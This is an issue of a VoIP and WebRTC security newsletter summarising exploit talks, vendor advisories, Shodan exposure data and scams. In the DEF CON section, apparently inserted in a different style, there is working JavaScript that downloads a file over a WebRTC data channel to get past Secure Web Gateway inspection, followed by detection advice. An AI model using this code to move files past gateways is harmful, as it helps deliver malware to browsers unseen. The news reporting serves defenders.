RTC Security Newsletter

Curated VoIP and WebRTC security news, research and updates by Enable Security.


November 2024: Breaking VoIP & WebRTC – Exploits, Vulnerabilities, and Shodan Insights

Published on Nov 29, 2024

Welcome to the November issue of your favourite VoIP and WebRTC security newsletter!

In this edition, we cover:

  • Exploitation of Messenger from Meta and the internals of this application.
  • Vulnerabilities in WebRTC, Poly Video Conferencing systems, Cisco phones, Qualcomm DSP video codecs.
  • VoIP devices on the Internet, Shodan has you covered.

The RTCSec newsletter is a free periodic newsletter bringing you commentary and news around VoIP and WebRTC security. We cover both defensive and offensive security as they relate to Real-time Communications.

What is RTC security anyway? Real-time communications security determines if you can safely communicate in real time - whether it be with other humans or machines.

You may sign up to receive the RTCSec newsletter here. If you like what we’re doing, you’re most welcome to:

  • Forward it to those who may find this newsletter particularly fruitful.
  • Let us know if there are any RTC security news items we should cover.

To view past issues, please visit our website at https://www.enablesecurity.com/newsletter/.


Our news

2025 is knocking - Penetration Testing or Security Consultancy?

As we approach the end of the year, our team at Enable Security is already gearing up for an exciting Q1 2025. If you have a product that requires thorough security assessment, particularly in the realm of VoIP and WebRTC systems, we’re uniquely positioned to help. Our expertise extends beyond these areas, covering application Denial-of-Service (DoS), web applications and network security to ensure the appropriate coverage for your communications systems.

We understand that not all companies are ready for a full penetration test, yet still require valuable insights into their security decisions. That’s why we offer flexible consultancy services tailored to your specific needs. Whether you’re looking for focused guidance on particular aspects of your RTC applications or a broader overview, we are there to assist. This option is particularly beneficial for startups operating with tighter budgets, allowing you to leverage our expertise without breaking the bank.

Get in touch with us through our online contact form or schedule a meeting directly.

What’s happening?

One click exploit for Messenger on Android - a talk at HEXACON2024

If the internals of Meta's Messenger app are just your thing, this talk, called Defense through Offense, is a great resource. The authors cover chaining vulnerabilities across two internal libraries: Rsys, which manages client-side signaling and WebRTC, and Spark AR, Meta's augmented reality effect engine. The end result was remote code execution, thanks to the following four vulnerabilities:

  1. Rsys Apps Vulnerable to Incoming Call Metadata Spoofing (affects Rsys)
  2. Out of bounds Read in SegmentationModule:getForegroundPercent (affects Spark AR)
  3. Signaling messages sendable over media data channel (affects Rsys)
  4. Incorrect Signed Integer Comparison Leads to OOB Write in UnifiedPlanSdpUpdateSerializer::applyDelta (affects Rsys)

These vulnerabilities were discovered during internal code reviews at Meta. The talk concludes with a demonstration of remote code execution using a reverse shell.

This is an excellent talk and worth watching if you’re developing or testing anything similar to Meta Messenger. Give it a watch here.

Remote Code Execution Risk on Certain Poly Video Conference Devices (CVE-2024-9579)

This month, HP issued an advisory titled: Certain Poly Video Conference Devices – Potential Remote Code Execution. The description:

A potential vulnerability was discovered in certain Poly video conferencing devices. The firmware flaw does not properly sanitize user input. The exploitation of this vulnerability is dependent on a layered attack and cannot be exploited by itself.

We searched for additional information but found none. The security researchers from modzero who reported this flaw had previously issued advisories on Poly VoIP devices. Their full report detailed the following security issues:

  • Administrator Session Prediction
  • Denial of Service Through HTTP Request
  • OS Command Injection in Diagnostics-Telnet
  • Configuration Import Allows Unverified Password Change
  • Missing Firmware Anti-Rollback Protection
  • Backdoor-Mode Allows Telnet Root Access
  • Missing Authorization for Cloud Registration Code

These were fixed back in January 2024.

Security researcher Shawn Merdinger posts about VoIP devices found on the Internet

These past weeks, Shawn Merdinger has been publishing interesting LinkedIn posts that feature VoIP devices and related software that are indexed by Shodan, the search engine for the Internet of Everything.

Here’s a quick summary of each:

  • A post about VoIP devices on Shodan mentions how the search engine has indexed 10,733 devices from Grandstream Networks that have their web interface exposed to the Internet. Access to this web interface allows malicious users to do a lot, including network packet capturing and generation of phone calls. He also covered Polycom’s devices, including some that appear to be actually defaced, displaying messages such as “hacked by …”. Cisco, FreePBX and Snom also got a mention. The original post can be read here.
  • He came across 65 Vocera Web Console interfaces. Vocera makes communications devices used in the healthcare industry; there are no known vulnerabilities in this web interface, and the company has undergone various changes in the past, including becoming part of Stryker Corporation. Original post here.

Shawn is a pioneer in VoIP device research, having been active in the field since 2005 and publishing various advisories during that time. While his recent posts focused on web interfaces, one can also search for VoIP devices by searching for port 5060, which turns up 4,246,592 results at the time of writing.

Uncovering Hidden Threats: Dr. Willy R. Vasquez on Video Codecs, CVEs, and Zero Trust

Dr. Willy Vasquez discussed video codec security and related topics on the YouTube channel “John Has Trust Issues.” If you’re interested in this subject, you can watch the interview here.

They covered topics like:

  • Malicious video files, such as the one that compromised Jeff Bezos’ smartphone through WhatsApp.
  • How sandboxing video parsing code can mitigate the security issues he researched at the University of Texas.
  • Using H26Forge to fuzz video parsing software, discovering crashes and potential vulnerabilities, including some in the iOS kernel.
  • His journey into the world of security research and how he entered the field.

Security Updates and Vulnerability News Round-Up

Authorities bust multi-million message SMS fraud and 730 million call VoIP scam in Thailand

Thai authorities uncovered two large-scale tech-based scams. The SMS fraud employed fake base stations to directly blast messages, showcasing an advanced technical approach. Meanwhile, the VoIP scam involved massive call centers using SIP trunks to bypass national carriers, facilitating millions of fraudulent calls.

Original content here.

Use after free in WebRTC. Reported by Cassidy Kim (@cassidy6564) on 2024-10-18

A “use after free” vulnerability was identified in WebRTC and reported by Cassidy Kim, who has a consistent track record of uncovering significant issues in WebRTC’s code. While the full details of the bug remain unreleased, it highlights the critical need to keep your web browser updated.

Original content here.

DEF CON 32 - Breaking Secure Web Gateways for Fun and Profit - Vivek Ramachandran, Jeswin Mathai

At DEF CON 32, Vivek Ramachandran and Jeswin Mathai from SquareX presented innovative techniques for bypassing Secure Web Gateways (SWGs) to deliver malware to web browsers. The presentation video is now available for all to watch.

Among their thirty demonstrated methods, one involved leveraging WebRTC by using a WebSocket connection for signaling to activate the WebRTC API, which then established a data channel to download malicious files. Their talk underscored the challenges SWGs face in filtering modern traffic, which has evolved far beyond traditional HTTP/1.1 patterns.
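The WebRTC variant works because the only thing the gateway sees over HTTP is the WebSocket carrying SDP; the file itself travels over DTLS/SCTP on UDP, which a proxy built for HTTP responses never gets to inspect. The browser-side sketch below is an added example and is not SquareX's code or a reproduction of their demo: it receives a file over a data channel that was negotiated through a WebSocket. The signaling URL, the JSON message shapes and the simple header/chunks/eof framing are assumptions chosen for the illustration; the pure framing helpers are the part that runs outside a browser.

```javascript
// Added example (not SquareX's code): file transfer over a WebRTC data
// channel negotiated via WebSocket signaling. SIGNALING_URL, the signaling
// JSON and the framing below are assumed for illustration only.
const SIGNALING_URL = "wss://signal.example.invalid/room"; // placeholder

// Assumed wire framing on the data channel: JSON header, binary chunks, JSON eof.
// Yields strings and Uint8Array views, exactly what dc.send() accepts.
function* frameFile(name, bytes, chunkSize = 16 * 1024) {
  yield JSON.stringify({ type: "header", name, size: bytes.byteLength });
  for (let off = 0; off < bytes.byteLength; off += chunkSize) {
    yield bytes.subarray(off, off + chunkSize); // subarray clamps the last chunk
  }
  yield JSON.stringify({ type: "eof" });
}

// Receiver state machine: collects chunks, validates the byte count on eof.
function createReceiver() {
  const state = { name: null, size: 0, chunks: [], received: 0, done: false };
  return {
    onMessage(data) {
      if (typeof data === "string") {
        const msg = JSON.parse(data);
        if (msg.type === "header") {
          state.name = msg.name;
          state.size = msg.size;
        } else if (msg.type === "eof") {
          if (state.received !== state.size) throw new Error("size mismatch");
          state.done = true;
        }
        return;
      }
      // Binary frame: ArrayBuffer from a real channel, or a typed-array view.
      const chunk = data instanceof ArrayBuffer
        ? new Uint8Array(data)
        : new Uint8Array(data.buffer, data.byteOffset, data.byteLength);
      state.chunks.push(chunk);
      state.received += chunk.byteLength;
    },
    // Returns {name, bytes} once eof was seen, null while incomplete.
    assemble() {
      if (!state.done) return null;
      const out = new Uint8Array(state.received);
      let off = 0;
      for (const c of state.chunks) { out.set(c, off); off += c.byteLength; }
      return { name: state.name, bytes: out };
    },
  };
}

// Browser glue: the remote side opens the channel; our answer and ICE
// candidates go back over the WebSocket. Resolves with the assembled file.
function downloadViaDataChannel(signalingUrl = SIGNALING_URL) {
  return new Promise((resolve, reject) => {
    const ws = new WebSocket(signalingUrl);
    const pc = new RTCPeerConnection({ iceServers: [] }); // host candidates only
    const receiver = createReceiver();
    pc.onicecandidate = (e) => {
      if (e.candidate) ws.send(JSON.stringify({ candidate: e.candidate }));
    };
    pc.ondatachannel = (e) => {
      const dc = e.channel;
      dc.binaryType = "arraybuffer";
      dc.onmessage = (m) => receiver.onMessage(m.data);
      dc.onclose = () => {
        const file = receiver.assemble();
        file ? resolve(file) : reject(new Error("transfer incomplete"));
      };
    };
    ws.onmessage = async (m) => {
      const msg = JSON.parse(m.data);
      if (msg.sdp) { // the offer arrives over the WebSocket, not over HTTP
        await pc.setRemoteDescription(msg);
        await pc.setLocalDescription(await pc.createAnswer());
        ws.send(JSON.stringify(pc.localDescription));
      } else if (msg.candidate) {
        await pc.addIceCandidate(msg.candidate);
      }
    };
    ws.onerror = () => reject(new Error("signaling failed"));
  });
}
// In a browser: downloadViaDataChannel().then(({ name, bytes }) => ...);
```

From a detection standpoint the lesson is where the bytes are not: no HTTP request ever carries the file, so response-body scanning cannot catch it. What a gateway can still see is the SDP in the WebSocket frames (an `a=fingerprint` line and ICE candidates are a strong tell) and, on the network, outbound DTLS flows to the negotiated UDP ports; policy on those is what closes the gap, not signature matching on HTTP.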

Original content here.

Cisco 7800, 8800, and 9800 Series Phones Information Disclosure Vulnerability

A medium severity vulnerability has been identified in Cisco’s 7800, 8800, and 9800 series phones, enabling unauthenticated, remote attackers to access sensitive information. Specifically, this flaw could expose incoming and outgoing call records on affected devices. However, the Web Access feature, which exploitation depends on, is disabled by default.

Original content here.

Cisco 6800, 7800, 8800, and 9800 Series Phones with Multiplatform Firmware Stored Cross-Site Scripting Vulnerabilities

These medium severity vulnerabilities affect Cisco 6800, 7800, 8800, and 9800 series phones with Multiplatform Firmware, potentially allowing stored cross-site scripting (XSS) attacks. To exploit them, Web Access must be enabled (it is disabled by default) and the attacker must possess Admin credentials. If these web interfaces have no cross-site request forgery (CSRF) protection, an alternative attack vector would be tricking a logged-in administrator into visiting a malicious website. Exploitation remains challenging due to these prerequisites.

Original content here.

CVE-2024-38422 : Memory corruption while processing voice in Qualcomm Digital Signal Processor (DSP)

Included in Qualcomm’s November 2024 batch of security bulletins, CVE-2024-38422 addresses a memory corruption vulnerability in the Digital Signal Processor (DSP) when processing voice packets containing arbitrary data from the ADSP. The issue affects a wide range of Qualcomm products and is categorized with a “local” access vector. This could mean a local application may exploit the flaw to escalate privileges and potentially execute arbitrary code on the affected chip.

Original content here.

Snowflake, a censorship circumvention system using temporary WebRTC proxies

At USENIX Security ‘24, David Fifield from the Tor Project delivered a short talk about Snowflake, a system that leverages WebRTC to bypass internet censorship. It is built into Tor Browser, so anyone can use it without extra setup.

Original content here.


This newsletter was prepared by Sandro Gauci and the Enable Security team for RTCSec newsletter subscribers. If you have someone in mind who would benefit from our content, please share it.

To subscribe: here